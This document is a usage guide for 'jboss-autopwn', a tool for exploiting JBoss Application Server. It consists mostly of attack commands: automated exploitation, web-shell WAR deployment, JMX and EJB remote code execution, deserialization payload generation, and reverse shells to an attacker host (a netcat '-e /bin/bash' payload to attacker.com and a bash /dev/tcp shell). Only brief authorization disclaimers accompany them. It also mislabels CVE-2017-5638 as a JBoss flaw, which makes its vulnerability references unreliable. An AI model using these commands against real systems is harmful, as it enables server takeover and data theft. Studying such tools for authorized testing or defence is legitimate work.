jboss-autopwn

Overview

jboss-autopwn is a JBoss Application Server exploitation tool designed for security professionals to automate the discovery and exploitation of known JBoss vulnerabilities. It facilitates rapid vulnerability assessment and verification of JBoss AS security posture during authorized penetration tests.

The tool supports multiple JBoss versions and provides automated exploitation capabilities for common misconfigurations and known CVEs affecting JBoss AS deployments.

Installation

Prerequisites

• Python 2.7+ or Python 3.x
• Git
• JBoss AS instance (for testing)
• Proper authorization and scope approval

Installation Steps

# Clone the repository
git clone https://github.com/SecurityBegins/jboss-autopwn.git
cd jboss-autopwn

# Install dependencies
pip install -r requirements.txt

# Make executable
chmod +x jboss-autopwn.py

# Verify installation
python jboss-autopwn.py --help

Docker Installation

# Build Docker image
docker build -t jboss-autopwn .

# Run in container
docker run -it jboss-autopwn python jboss-autopwn.py --help

Basic Usage

Syntax

python jboss-autopwn.py [OPTIONS] -t <target>

Common Options

Option	Description
-t, --target	Target JBoss URL (http://host:port)
-p, --port	Port number (default: 8080)
-u, --username	JBoss admin username
-P, --password	JBoss admin password
--exploit	Specific exploit to run
-f, --file	Payload file for upload
-v, --verbose	Verbose output
-h, --help	Display help message

Common Commands

Target Discovery and Probing

# Basic target scanning
python jboss-autopwn.py -t http://192.168.1.100:8080

# Scan with custom port
python jboss-autopwn.py -t 192.168.1.100 -p 8090

# Verbose output for debugging
python jboss-autopwn.py -t http://target.com:8080 -v

# Scan entire subnet
python jboss-autopwn.py -t http://192.168.1.0/24 -p 8080

Version Detection

# Detect JBoss version
python jboss-autopwn.py -t http://target.com:8080 --version

# Check for specific vulnerability
python jboss-autopwn.py -t http://target.com:8080 --check-cve CVE-2017-12149

# List detected vulnerabilities
python jboss-autopwn.py -t http://target.com:8080 --list-vulns

Exploitation Techniques

# Auto-exploit detected vulnerabilities
python jboss-autopwn.py -t http://target.com:8080 --auto-exploit

# Exploit with reverse shell
python jboss-autopwn.py -t http://target.com:8080 --exploit shell \
  --lhost 192.168.1.50 --lport 4444

# Upload malicious WAR file
python jboss-autopwn.py -t http://target.com:8080 \
  -f malicious.war --deploy

# Execute system command
python jboss-autopwn.py -t http://target.com:8080 \
  --cmd "whoami" --execute

Authenticated Exploitation

# Connect with credentials
python jboss-autopwn.py -t http://target.com:8080 \
  -u admin -P password123 --exploit

# Use provided credentials for JMX
python jboss-autopwn.py -t http://target.com:8080 \
  --jmx-user admin --jmx-pass password123 \
  --jmx-exploit

Exploit Types

WAR Deployment Exploits

# Generate web shell WAR
python jboss-autopwn.py -t http://target.com:8080 \
  --generate-war shell.war

# Deploy WAR directly
python jboss-autopwn.py -t http://target.com:8080 \
  -f shell.war --direct-deploy

# Access deployed application
curl http://target.com:8080/shell/

JMX Exploitation

# Exploit JMX service
python jboss-autopwn.py -t http://target.com:8080 \
  --jmx-service --jmx-port 4447

# Create malicious MBean
python jboss-autopwn.py -t http://target.com:8080 \
  --create-mbean --bean-class PayloadClass

EJB Invocation

# Invoke EJB methods
python jboss-autopwn.py -t http://target.com:8080 \
  --invoke-ejb -b TargetEJB

# Remote method execution via EJB
python jboss-autopwn.py -t http://target.com:8080 \
  --ejb-rce --method-name execute

Advanced Configuration

Custom Payload Creation

# Create custom Java deserialization payload
python jboss-autopwn.py --generate-payload \
  --payload-type java-deser \
  --command "nc attacker.com 4444 -e /bin/bash"

# Generate ysoserial payload
python jboss-autopwn.py --payload-generator ysoserial \
  --gadget CommonsCollections5 \
  --command "touch /tmp/pwned"

Session Configuration

# Save configuration for repeated use
cat > jboss-config.txt << EOF
target=http://192.168.1.100:8080
port=8080
username=admin
password=admin123
timeout=30
retries=3
EOF

# Use configuration file
python jboss-autopwn.py -c jboss-config.txt

Multi-Target Scanning

# Create targets file
cat > targets.txt << EOF
http://192.168.1.100:8080
http://192.168.1.101:8080
http://target.example.com:8080
EOF

# Scan multiple targets
python jboss-autopwn.py -f targets.txt --batch-mode

# Batch exploitation
python jboss-autopwn.py -f targets.txt --exploit --log-results

Vulnerability Assessment

Known JBoss Vulnerabilities

# Check CVE-2017-12149 (Deserialization RCE)
python jboss-autopwn.py -t http://target.com:8080 \
  --check-cve CVE-2017-12149

# Check CVE-2017-5638 (EJBInvokerServlet)
python jboss-autopwn.py -t http://target.com:8080 \
  --check-cve CVE-2017-5638

# Comprehensive vulnerability scan
python jboss-autopwn.py -t http://target.com:8080 \
  --full-scan --report vulnerability-report.html

Output and Reporting

Generate Reports

# HTML report generation
python jboss-autopwn.py -t http://target.com:8080 \
  --full-scan --html-report report.html

# JSON output for automation
python jboss-autopwn.py -t http://target.com:8080 \
  --output-json results.json

# CSV export for analysis
python jboss-autopwn.py -t http://target.com:8080 \
  --output-csv results.csv

Logging and Monitoring

# Enable detailed logging
python jboss-autopwn.py -t http://target.com:8080 \
  -v --log-file audit.log

# Real-time output
python jboss-autopwn.py -t http://target.com:8080 \
  --real-time-output

# Save session transcript
python jboss-autopwn.py -t http://target.com:8080 \
  --transcript session.txt

Reverse Shell and Post-Exploitation

Establishing Command Shells

# Reverse shell with Netcat listener
# Attacker machine:
nc -lvnp 4444

# jboss-autopwn command:
python jboss-autopwn.py -t http://target.com:8080 \
  --reverse-shell --lhost 192.168.1.50 --lport 4444

# Bash reverse shell
python jboss-autopwn.py -t http://target.com:8080 \
  --cmd "bash -i >& /dev/tcp/192.168.1.50/4444 0>&1"

Interactive Shell Access

# Start interactive shell mode
python jboss-autopwn.py -t http://target.com:8080 \
  --interactive-shell

# Execute commands interactively
jboss> whoami
jboss> id
jboss> ls -la /opt/jboss

Best Practices

Pre-Exploitation Checklist

• Verify scope and obtain written authorization
• Document target system details and baseline
• Test tools on isolated lab environments first
• Prepare incident response procedures
• Establish clear communication channels
• Maintain detailed activity logs
• Create backup snapshots before testing

Safe Testing Guidelines

# Dry-run mode (show what would happen without executing)
python jboss-autopwn.py -t http://target.com:8080 \
  --dry-run --verbose

# Test on development instance first
python jboss-autopwn.py -t http://dev-jboss.internal:8080 \
  --safe-mode

# Validate payload before deployment
python jboss-autopwn.py --validate-payload test.war

Troubleshooting

Connection Issues

# Test connectivity
python jboss-autopwn.py -t http://target.com:8080 \
  --test-connection --verbose

# Check proxy settings
python jboss-autopwn.py -t http://target.com:8080 \
  --proxy http://proxy.internal:8080 \
  --proxy-user username --proxy-pass password

# SSL/TLS verification
python jboss-autopwn.py -t https://target.com:8443 \
  --ignore-ssl-warnings

Common Errors and Solutions

Error	Solution
Connection timeout	Verify target is online, check firewall rules, adjust timeout
Authentication failed	Verify credentials, check account lockout status
Version detection failed	Try manual version specification with --version
Payload upload failed	Check file permissions, verify WAR format, check disk space
RCE not working	Try different gadget chains, verify Java version compatibility

Debug Mode

# Maximum verbosity
python jboss-autopwn.py -t http://target.com:8080 \
  -vvv --debug --log-level DEBUG

# Packet capture
python jboss-autopwn.py -t http://target.com:8080 \
  --tcpdump --pcap-file traffic.pcap

# Python traceback on error
python jboss-autopwn.py -t http://target.com:8080 \
  --verbose --traceback

Legal and Ethical Considerations

• Only use jboss-autopwn on systems you own or have explicit written authorization to test
• Obtain proper approval from system owners and stakeholders before testing
• Follow responsible disclosure procedures for discovered vulnerabilities
• Maintain confidentiality of security assessment results
• Document all activities for compliance and audit purposes
• Use only for authorized penetration testing and vulnerability assessment
• Comply with all applicable laws and regulations in your jurisdiction

Resources and References

• JBoss AS Security Advisory: https://issues.jboss.org/
• CVE Database: https://cve.mitre.org/
• OWASP Deserialization Cheat Sheet
• ysoserial Gadget Chain Reference
• JBoss Exploitation Frameworks and Techniques

See Also

• Metasploit Framework JBoss modules
• Custom exploitation development techniques
• Java deserialization exploitation
• WAR file structure and deployment